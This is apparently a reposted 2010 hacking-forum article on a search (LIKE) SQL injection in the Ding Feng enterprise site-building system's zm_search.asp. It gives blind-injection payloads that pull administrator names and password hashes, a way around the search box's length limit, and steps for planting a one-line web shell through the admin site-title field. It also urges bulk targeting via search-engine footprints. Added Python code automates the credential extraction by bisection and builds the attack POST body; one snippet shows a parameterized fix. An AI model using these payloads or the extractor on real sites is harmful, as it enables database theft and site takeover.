Ding Feng Enterprise Smart Site-Building System: search injection vulnerability analysis and exploitation - Vulnerability Warning - Black Bar Safety Net

ID MYHACK58:62201026318
Type myhack58
Reporter 佚名 (anonymous)
Modified 2010-03-04T00:00:00


Author: L4nk0r[Mo if you are asked]

Yesterday I got a webshell on a site running this system, but that was just by downloading the default database. Afterwards I noticed the system's interface is quite nice, so I took a look at its security. This article gives a short analysis of its search injection vulnerability, how to exploit it, and how to take shells in bulk.

I. A simple analysis

Vulnerable file: zm_search.asp. The relevant code is as follows:

' t and key are read straight out of the POST body
t=Request.Form("t")
key=Request.Form("key")

' the only check: neither may be empty
if t="" or key="" then
    Response.Write("<script>alert('please input keywords!');history.back();</script>")
    Response.End()
end if

' key is concatenated into the LIKE pattern with no filtering at all
if t=1 then
    sql="select * from Zm_Product where name like '%"&key&"%' order by ord asc,id desc"
    menuname="search product"
else
    sql="select * from Zm_News where title like '%"&key&"%' order by ord asc,id desc"
    menuname="search news"
end if

Both variables, t and key, are taken directly from the form. The only check is whether they are empty; a non-empty key goes straight into the query string. The result is a search-type (LIKE) injection vulnerability.

A note for newcomers:

First, some background on the Like operator in a SQL WHERE clause. Like performs a fuzzy match, and a fuzzy match with Like needs wildcards. The "%" wildcard stands for zero or more arbitrary characters. A few examples:

Like "hacker%"  matches anything that begins with "hacker"
Like "%hack"    matches anything that ends with "hack"
Like "%hack%"   matches anything that contains "hack"

Open a site running the system and type keyword' and 1=1 and '%'=' into the search box, where keyword is a word the search can actually find, say "hacker". The page returns the hacker-related articles, so the statement hacker' and 1=1 and '%'=' behaves normally: after the code wraps it, the query reads ... where title like '%hacker' and 1=1 and '%'='%' ..., and the trailing '%'='%' is always true. Next enter hacker' and 1=2 and '%'=' and nothing is found. Note that the keyword has to be one that matches an existing article, otherwise the true and false responses cannot be told apart.
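As an added example (not code from the original article or from the Ding Feng system), the following Python reproduces the news branch of zm_search.asp against an in-memory SQLite table filled with constructed rows, so the effect of the three keyword forms can be run locally. It also shows the parameterized form that removes the injection. The table contents, the keyword "hacker" and the function names are assumptions of this example; the concatenation and the payload shapes are the page's.

```python
import sqlite3

# Constructed sample rows standing in for a Ding Feng site's Zm_News table
# (id, ord, title). Only one title ends with "hacker"; two contain it.
SAMPLE_NEWS = [
    (1, 1, "Ding Feng welcomes every hacker"),
    (2, 2, "Ding Feng product launch"),
    (3, 3, "Hacker tools roundup"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("create table Zm_News (id integer, ord integer, title text)")
    conn.executemany("insert into Zm_News values (?, ?, ?)", SAMPLE_NEWS)
    return conn


def build_sql_vulnerable(key):
    # Exactly the concatenation zm_search.asp does in its news branch:
    # the raw key lands between '%  and  %' inside the SQL text.
    return ("select * from Zm_News where title like '%" + key
            + "%' order by ord asc,id desc")


def search_vulnerable(conn, key):
    """Row count the vulnerable page would render for this key."""
    return len(conn.execute(build_sql_vulnerable(key)).fetchall())


def search_safe(conn, key):
    """Hardened form: the key is bound as a parameter, so quotes in it are
    data, not SQL. A % in the key is still a LIKE wildcard, which is fine."""
    rows = conn.execute(
        "select * from Zm_News where title like ? order by ord asc,id desc",
        ("%" + key + "%",),
    ).fetchall()
    return len(rows)


if __name__ == "__main__":
    db = make_db()
    for key in ("hacker",
                "hacker' and 1=1 and '%'='",    # closes LIKE early: matches titles ENDING in hacker
                "hacker%' and 1=1 and '%'='",   # keeps the %: contains-match, true condition
                "hacker%' and 1=2 and '%'='"):  # false condition: no rows
        print(repr(key), "->", search_vulnerable(db, key), "rows")
        print("  sql:", build_sql_vulnerable(key))
    print("parameterized, injected key ->",
          search_safe(db, "hacker%' and 1=1 and '%'='"), "rows")
```

Running it shows why the later payloads in this article carry a % right after the keyword: without it the injected quote closes the pattern at '%hacker', which only matches titles ending in the keyword, and the true and false cases may look alike. With the parameterized query the whole injected string is searched for literally and returns nothing.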

II. Exploiting the vulnerability

With the principle understood, we can construct the injected statements. Here the search keyword is "Ding Feng" (鼎峰), which every Ding Feng site can find; remember that the keyword must match something, otherwise the responses are very hard to tell apart later. Back on the home page search, enter the following. * When constructing the statement, pay attention to closing the leading % and the single quotes on both sides.

Ding Feng%' and 1=1 and '%'='   ----------------- statement 1

The whole statement cannot be typed in, though: the search box limits the input length, and the maximum I found was 20 characters. Looking at the code again, search.asp submits to zm_search.asp for processing, so we can write our own form that assigns t and key and thereby bypass the length limit. The form code is not given here; it is simple enough to write yourself. The form's action must point at the page that actually processes the POST, zm_search.asp (the code above reads Request.Form there), not at search.asp; check the code yourself if this is unclear. Now submit statement 1.

By changing the 1=1 in the form to other conditions you can guess out the data. For newcomers, here are the statements and what each one does:

Statement 1: Ding Feng%' and 1=1 and '%'='
  1=1 holds, the article is found: this is the normal ("true") response.
Statement 2: Ding Feng%' and 1=2 and '%'='
  1=2 clearly does not hold, no article is found: this is the abnormal ("false") response.
Statement 3: Ding Feng%' and 1<(select count(*) from zm_admin) and '%'='
  Tests whether there is more than one administrator.
Statement 4: Ding Feng%' and (select count(name) from zm_admin)>0 and '%'='
  Tests whether the column name exists; from looking at the database we already know it does.
Statement 5: Ding Feng%' and (select top 1 asc(mid(name,1,1)) from zm_admin)>96 and '%'='
  Tests whether the ASCII code of the first character of the first user's name is greater than 96, i.e. at least 97, which is 'a'.

In every statement the trailing '%'=' is completed by the code's own closing %' into '%'='%', which is always true; type it without spaces, since ' % ' = ' would not compare equal and every response would be "false".

In the same way, replace the name column in statement 5 with password and pick out the password's MD5 hash character by character.
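As an added example (not code from the original article or from the Ding Feng system), the following Python carries statement 5 through to the end against a constructed SQLite stand-in for the site: a boolean oracle that asks "does the Ding Feng article still appear?", a payload builder with the article's statement shape, and a bisection over the ASCII range that recovers a whole column value in about 7 comparisons per character instead of guessing >96, >97 and so on. It also builds the POST body the hand-written form sends to zm_search.asp. Assumptions: the admin row (name "admin", password md5("admin")), the table layout, and the function names are constructed; Access's top 1 and asc(mid()) are written here as order by id limit 1 and unicode(substr()) because SQLite has no other spelling for them.

```python
import sqlite3
from urllib.parse import urlencode

# Constructed target: one admin row (the password is md5("admin")), plus one
# news row containing the keyword so the oracle has a "true" page to return.
ADMIN_ROWS = [(1, "admin", "21232f297a57a5a743894a0e4a801fc3")]


def make_target():
    conn = sqlite3.connect(":memory:")
    conn.execute("create table zm_admin (id integer, name text, password text)")
    conn.execute("create table Zm_News (id integer, ord integer, title text)")
    conn.executemany("insert into zm_admin values (?, ?, ?)", ADMIN_ROWS)
    conn.execute("insert into Zm_News values (1, 1, 'Ding Feng news')")
    return conn


def page_returns_results(conn, key):
    """Boolean oracle: does zm_search.asp still list the Ding Feng article?"""
    sql = ("select * from Zm_News where title like '%" + key
           + "%' order by ord asc,id desc")
    return len(conn.execute(sql).fetchall()) > 0


def payload(condition):
    # Article's statement shape: keyword, keep the %, close the quote, inject,
    # then '%'=' which the page completes to '%'='%' (always true).
    return "Ding Feng%' and (" + condition + ") and '%'='"


def char_oracle(conn, column, pos, n):
    """True iff the code of character `pos` of the first admin's `column` is > n.
    Access original: (select top 1 asc(mid(column,pos,1)) from zm_admin)>n
    SQLite spelling used here: unicode(substr()) and order by id limit 1."""
    cond = (f"(select unicode(substr({column},{pos},1)) from zm_admin "
            f"order by id limit 1)>{n}")
    return page_returns_results(conn, payload(cond))


def extract_column(conn, column, max_len=64):
    """Recover a column value one character at a time by bisection on the
    ASCII code (7 comparisons per character instead of guessing >96, >97...)."""
    out = []
    for pos in range(1, max_len + 1):
        # Past the end substr() is '' and unicode('') is NULL, so ">0" is false.
        if not char_oracle(conn, column, pos, 0):
            break
        if char_oracle(conn, column, pos, 127):
            raise ValueError("non-ASCII character; widen the search range")
        lo, hi = 1, 127                     # invariant: code is in [lo, hi]
        while lo < hi:
            mid = (lo + hi) // 2
            if char_oracle(conn, column, pos, mid):
                lo = mid + 1
            else:
                hi = mid
        out.append(chr(lo))
    return "".join(out)


def post_body(key, t="2"):
    """Body the hand-written form posts straight to zm_search.asp; any t other
    than 1 selects the Zm_News branch. This is how the 20-character box limit
    is bypassed."""
    return urlencode({"t": t, "key": key})


if __name__ == "__main__":
    target = make_target()
    print("name     =", extract_column(target, "name"))
    print("password =", extract_column(target, "password"))
    print("POST body:", post_body(payload("1=1")))
```

Against a real Access back end the same loop runs with the Access spelling in char_oracle and page_returns_results replaced by an HTTP POST of post_body() followed by a check for the Ding Feng article in the response; note that on Access, asc() of an empty string raises an error rather than returning NULL, so the end-of-string probe may show up as an error page instead of an empty result, which the oracle should also treat as "false".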

Injection tools can find this too, but you have to add the fields yourself and, besides the keyword, include a term that actually matches an article. I recommend NBSI and HDSI; both are simple, so no demo here.

III. Getting a webshell from the back end

The injection yields the administrator's password, so we go to the back end; the default address is Manage/login.asp. login.asp only strips single quotes with a simple R() function, which rules out the usual universal-password login, so take the admin password directly from the injection. In the site configuration, write a one-sentence Trojan straight into the title field, paying attention to closing the statement. The configuration is as follows:


The Trojan was planted successfully, as shown:


Ok. You can search Baidu for the footprint and test in batches; I won't say more, play with it yourselves, and don't use it for illegal purposes. This system has many other problems as well; interested friends can keep digging.